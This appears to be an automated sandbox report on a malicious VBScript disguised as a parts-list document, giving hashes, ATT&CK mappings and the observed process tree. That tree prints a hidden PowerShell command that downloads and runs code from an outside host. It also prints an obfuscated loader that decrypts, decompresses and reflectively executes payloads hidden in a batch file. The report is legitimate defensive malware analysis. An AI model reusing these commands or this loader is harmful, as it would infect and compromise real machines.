9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2

General

Target

List of Required PN#_Desc_&_Qty Details.vbs
Size

79KB
MD5

c0e2ce250c4979a59970d22fd99f340f
SHA1

4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0
SHA256

9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2
SHA512

f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404
SSDEEP

1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2808	powershell.exe
764	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2808	powershell.exe
764	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 2808	2312	WScript.exe	30
PID 2312 wrote to memory of 2808	2312	WScript.exe	30
PID 2312 wrote to memory of 2808	2312	WScript.exe	30
PID 2312 wrote to memory of 1640	2312	WScript.exe	33
PID 2312 wrote to memory of 1640	2312	WScript.exe	33
PID 2312 wrote to memory of 1640	2312	WScript.exe	33
PID 1640 wrote to memory of 2292	1640	cmd.exe	35
PID 1640 wrote to memory of 2292	1640	cmd.exe	35
PID 1640 wrote to memory of 2292	1640	cmd.exe	35
PID 1640 wrote to memory of 764	1640	cmd.exe	36
PID 1640 wrote to memory of 764	1640	cmd.exe	36
PID 1640 wrote to memory of 764	1640	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\List of Required PN#_Desc_&_Qty Details.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
8078d12b395b01ad397cec896ae02a6a

SHA1
2a5b18660c4b2b40969651ca16a1ede64f3aecf5

SHA256
0c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7

SHA512
df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3cc0f951cb043420ea1333a03020f3c6

SHA1
61bd3bbfa5e31d42d287f8bcf993e00cfee215e3

SHA256
34625932ee23079d12e3fd854bf73ea1df68c682ee6723060f7f9d414c379a21

SHA512
f220f6bfda43b32aa2ed06f8333eb445a7b0a02fed90cbaffb2afe2b21758663842c1198891eba17297c60b9f0c48c4f44c5a430e75a0db4fb59bca32616562a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7Q2OBS3978GEIKHHEO6V.temp

Filesize
7KB

MD5
88eae158157933c1fde5d82a0880832e

SHA1
3b37ad6c13d87a5af551cb34fb7a1d842101b269

SHA256
14e069f2f6968be03523ab9a6ce22006742787ff71ee02d18306b31a3832c631

SHA512
45eec3ab58d13d1d7bc5a383d8a6d3984fd9f7d080f024a95961c12228757e74b4d0389d2ff8e03dc3446a75780ee2ebca9dd3ef745a3df7c36a9b7b1984fd0d

Download Submit
memory/764-27-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/764-26-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2808-7-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-10-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-11-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-8-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-9-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-4-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

Filesize
4KB

Download
memory/2808-6-0x0000000002060000-0x0000000002068000-memory.dmp

Filesize
32KB

Download
memory/2808-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing